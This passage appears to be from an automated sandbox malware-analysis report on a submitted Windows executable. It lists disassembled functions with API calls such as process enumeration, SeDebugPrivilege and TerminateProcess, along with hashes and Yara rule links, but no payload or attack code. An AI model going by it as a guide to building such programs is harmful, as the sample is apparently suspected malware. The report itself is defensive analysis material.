                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                          • API String ID: 0-572801152
                                                                          • Opcode ID: 22943352b676bb36a5ed94a0eb7edf8ea16324bcbae35f80e5cf35d9e8deb331
                                                                          • Instruction ID: 6ec24a8a5c50e54ffc1589fe7766e46ab72ea2080bf1a2c4335be49b67dbdf3f
                                                                          • Opcode Fuzzy Hash: 22943352b676bb36a5ed94a0eb7edf8ea16324bcbae35f80e5cf35d9e8deb331
                                                                          • Instruction Fuzzy Hash: E0C17571A003199FDF11EF58D884BBEB7F9FB48314F1984AAE905AB240E771AD45CB50
                                                                          Function 0038975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0036710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?,?,00367455), ref: 00367127
                                                                            • Part of subcall function 0036710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 00367142
                                                                            • Part of subcall function 0036710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 00367150
                                                                            • Part of subcall function 0036710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?), ref: 00367160
                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00389806
                                                                          • _memset.LIBCMT ref: 00389813
                                                                          • _memset.LIBCMT ref: 00389956
                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00389982
                                                                          • CoTaskMemFree.OLE32(?), ref: 0038998D
                                                                          Strings
                                                                          • NULL Pointer assignment, xrefs: 003899DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 1300414916-2785691316
                                                                          • Opcode ID: 88bbcd33e07cf0a87bb2f7c0b698c1a9138a1bd2fc552f76cad1a34e41dea7f9
                                                                          • Instruction ID: e28a0b754fd6d54fc8e8391e5711dd962a64c2e28a6b204c7fcc2ffa75bd91f7
                                                                          • Opcode Fuzzy Hash: 88bbcd33e07cf0a87bb2f7c0b698c1a9138a1bd2fc552f76cad1a34e41dea7f9
                                                                          • Instruction Fuzzy Hash: 6E912A71D00229EBDB16EFA5DC85EEEBBB9AF08310F10415AF419AB251DB715A44CFA0
                                                                          Function 00396D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00396E24
                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00396E38
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00396E52
                                                                          • _wcscat.LIBCMT ref: 00396EAD
                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00396EC4
                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00396EF2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window_wcscat
                                                                          • String ID: SysListView32
                                                                          • API String ID: 307300125-78025650
                                                                          • Opcode ID: 30a794d477479ca07637582235b82ad4d474e7a73c4a72e85f1ef2e5621bf042
                                                                          • Instruction ID: 6bcfbb57412bbaf310955d224011307811069fa4fa2e1b9514ca9f7e66119ee9
                                                                          • Opcode Fuzzy Hash: 30a794d477479ca07637582235b82ad4d474e7a73c4a72e85f1ef2e5621bf042
                                                                          • Instruction Fuzzy Hash: BB41A271A00348AFEF229F64CC86BEEB7E8EF08350F11442AF555EB191D6729D848B60
                                                                          Function 0038E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00373C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00373C7A
                                                                            • Part of subcall function 00373C55: Process32FirstW.KERNEL32(00000000,?), ref: 00373C88
                                                                            • Part of subcall function 00373C55: CloseHandle.KERNEL32(00000000), ref: 00373D52
                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038E9A4
                                                                          • GetLastError.KERNEL32 ref: 0038E9B7
                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038E9E6
                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0038EA63
                                                                          • GetLastError.KERNEL32(00000000), ref: 0038EA6E
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0038EAA3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                          • String ID: SeDebugPrivilege
                                                                          • API String ID: 2533919879-2896544425
                                                                          • Opcode ID: 66205553e83bb5f929b7af3b1a524730450f53302c126fd69d3318afb97b1c6c
                                                                          • Instruction ID: d2b7da3755dd6539c9e07e56d04022fb361e6a42e86f430b855d8119555bdc01
                                                                          • Opcode Fuzzy Hash: 66205553e83bb5f929b7af3b1a524730450f53302c126fd69d3318afb97b1c6c
                                                                          • Instruction Fuzzy Hash: C541CD312003009FDB1AEF24CCA6FAEB7A9AF45710F148459F9069F2D2CB79E844CB95
                                                                          Function 00372F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00373033
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoad
                                                                          • String ID: blank$info$question$stop$warning
                                                                          • API String ID: 2457776203-404129466
                                                                          • Opcode ID: d260bf3a7c4d215ad375339a73ed06c22ad66497e678983a653867b9e1bd02e1
                                                                          • Instruction ID: 365712dfe73410cb4e1152475826372efea8586cf1f8c13d4daaf93ad2e86292
                                                                          • Opcode Fuzzy Hash: d260bf3a7c4d215ad375339a73ed06c22ad66497e678983a653867b9e1bd02e1
                                                                          • Instruction Fuzzy Hash: 1B112B31348346BED7279B54DC82DAB779C9F19360F11402EF909A6181DBB95F4066A1
                                                                          Function 003742F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00374312
                                                                          • LoadStringW.USER32(00000000), ref: 00374319
                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0037432F
                                                                          • LoadStringW.USER32(00000000), ref: 00374336
                                                                          • _wprintf.LIBCMT ref: 0037435C
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0037437A
                                                                          Strings
                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00374357
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                          • API String ID: 3648134473-3128320259
                                                                          • Opcode ID: df3d41629ae7926411174e4e5147905df9efbb327b01b8daf460b8fb62ae4cb5
                                                                          • Instruction ID: db29e7e5353a9bd8e2e2db4cddd2e26454e409467f6cfbc852aabd29e7a55f2f
                                                                          • Opcode Fuzzy Hash: df3d41629ae7926411174e4e5147905df9efbb327b01b8daf460b8fb62ae4cb5
                                                                          • Instruction Fuzzy Hash: E7018FF6900208BFE712ABA0DD89EF6736CDB08301F0004A2B709E6011EA355E944B70
                                                                          Function 0039D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 0039D47C
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 0039D49C
                                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0039D6D7
                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0039D6F5
                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0039D716
                                                                          • ShowWindow.USER32(00000003,00000000), ref: 0039D735
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0039D75A
                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0039D77D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                          • String ID:
                                                                          • API String ID: 1211466189-0
                                                                          • Opcode ID: 44952e5915b1f0a32c233a316f6c3cac84b786ed5bef269f89a7add1ff923e9d
                                                                          • Instruction ID: e9af312a18da704a5a99a12a63ce94b10015b369662a0a46072e6bfb84be4431
                                                                          • Opcode Fuzzy Hash: 44952e5915b1f0a32c233a316f6c3cac84b786ed5bef269f89a7add1ff923e9d
                                                                          • Instruction Fuzzy Hash: 8DB17975600225EFDF16CF69C9867BD7BB5BF04701F09806AEC489B295D734A950CBA0
                                                                          Function 00312A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0034C1C7,00000004,00000000,00000000,00000000), ref: 00312ACF
                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0034C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00312B17
                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0034C1C7,00000004,00000000,00000000,00000000), ref: 0034C21A
                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0034C1C7,00000004,00000000,00000000,00000000), ref: 0034C286
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1268545403-0
                                                                          • Opcode ID: 634a34c3f335a524921f86c6f72b51561ca75dfdfad9a7ec9d95b90a84958173
                                                                          • Instruction ID: aafe70d556036b8cddc5e9a48675effc7f3d9bd2d29ddd0a9f1d9cf8dbd6cc58
                                                                          • Opcode Fuzzy Hash: 634a34c3f335a524921f86c6f72b51561ca75dfdfad9a7ec9d95b90a84958173
                                                                          • Instruction Fuzzy Hash: DE41FE316197809ECB7F57289C88BEB7BD9AF4D310F158819E04786560CAB1A8F1D720
                                                                          Function 003770C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 003770DD
                                                                            • Part of subcall function 00330DB6: std::exception::exception.LIBCMT ref: 00330DEC
                                                                            • Part of subcall function 00330DB6: __CxxThrowException@8.LIBCMT ref: 00330E01
                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00377114
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00377130
                                                                          • _memmove.LIBCMT ref: 0037717E
                                                                          • _memmove.LIBCMT ref: 0037719B
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003771AA
                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003771BF
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003771DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 256516436-0
                                                                          • Opcode ID: 7717e23e3a6dd7030a0a819c67093227e937d31ca9f26588b52d3985628dc0b7
                                                                          • Instruction ID: ca74755523d0342acea2f331924602ddf6eec0d4a7ba12630d9f53009dc163c0
                                                                          • Opcode Fuzzy Hash: 7717e23e3a6dd7030a0a819c67093227e937d31ca9f26588b52d3985628dc0b7
                                                                          • Instruction Fuzzy Hash: 22317235A00205EFCF15EFA4DC85AAEB7B8EF45310F1541A6E904DB256D735AE10CBA0
                                                                          Function 003961D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 003961EB
                                                                          • GetDC.USER32(00000000), ref: 003961F3
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003961FE
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0039620A
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00396246
                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00396257
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0039902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00396291
                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003962B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 3864802216-0
                                                                          • Opcode ID: 825ff51ec85697cbe0de2f304fda54ab0a5501dc3d45b2221b50b5d1cc6b494c
                                                                          • Instruction ID: 619c0dfa86d9f59efc87a2635a6085b53356cc1eb20035b66200cf7672d603ab
                                                                          • Opcode Fuzzy Hash: 825ff51ec85697cbe0de2f304fda54ab0a5501dc3d45b2221b50b5d1cc6b494c
                                                                          • Instruction Fuzzy Hash: 84316D72201210BFEF128F50CC8AFEA3BADEF49765F054066FE48DA291C6769C51CB60
                                                                          Function 0036BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: c4149c017ed22c99daaf0639a7e33926d80b9c8ff9d5b49f7e8dda45d7d519d1
                                                                          • Instruction ID: 2c8487c0af1fe8e98aff8ea4715e24274a4a4d94120f033cf797c84d8b243750
                                                                          • Opcode Fuzzy Hash: c4149c017ed22c99daaf0639a7e33926d80b9c8ff9d5b49f7e8dda45d7d519d1
                                                                          • Instruction Fuzzy Hash: EF21F3616012057BE2177616AD82FFBF36CEE11398F088020FD04DB64BEBA5DF518AA1
                                                                          Function 0037EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                            • Part of subcall function 0032FC86: _wcscpy.LIBCMT ref: 0032FCA9
                                                                          • _wcstok.LIBCMT ref: 0037EC94
                                                                          • _wcscpy.LIBCMT ref: 0037ED23
                                                                          • _memset.LIBCMT ref: 0037ED56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                          • String ID: X
                                                                          • API String ID: 774024439-3081909835
                                                                          • Opcode ID: 6dcba4d9c1951bed1d1f13ea3cd9750266f002eeb29dc666231e9862619ff025
                                                                          • Instruction ID: 871730526c3ba3de7acc749c77f1b6d4bd2eb4d86acee54f9b1524ec31aae76d
                                                                          • Opcode Fuzzy Hash: 6dcba4d9c1951bed1d1f13ea3cd9750266f002eeb29dc666231e9862619ff025
                                                                          • Instruction Fuzzy Hash: 8CC181715083019FC72AEF24C491A9AB7E4FF8D310F04896DF8999B2A1DB70ED45CB82
                                                                          Function 00311424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bbd609c28c1b8cfb627118480aaf9432868495c5a0519b37c99b9060dd1b935e
                                                                          • Instruction ID: 8a14e147d05f94f58118596c6c2eb5071e925f67948c6f3592f1a7107ebcdb5e
                                                                          • Opcode Fuzzy Hash: bbd609c28c1b8cfb627118480aaf9432868495c5a0519b37c99b9060dd1b935e
                                                                          • Instruction Fuzzy Hash: DB717F30900109EFCB0ACF59CC45AFEBB79FF89310F158159FA15AA251C734AA91CFA4
                                                                          Function 00386B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aea2a942848f285d049b63ffa32c383241cd175a6ee9bbbadd146f1310b3c3f3
                                                                          • Instruction ID: 0ac6ce74c9db6018a7e615c861098dea4594f1782b28c3074070e236ec19e2a0
                                                                          • Opcode Fuzzy Hash: aea2a942848f285d049b63ffa32c383241cd175a6ee9bbbadd146f1310b3c3f3
                                                                          • Instruction Fuzzy Hash: 1261BF72208300ABC716FB24CC92FABB7E8AF88714F10491DF9469B292DB70ED45C752
                                                                          Function 0039B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindow.USER32(01146948), ref: 0039B3EB
                                                                          • IsWindowEnabled.USER32(01146948), ref: 0039B3F7
                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0039B4DB
                                                                          • SendMessageW.USER32(01146948,000000B0,?,?), ref: 0039B512
                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 0039B54F
                                                                          • GetWindowLongW.USER32(01146948,000000EC), ref: 0039B571
                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0039B589
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
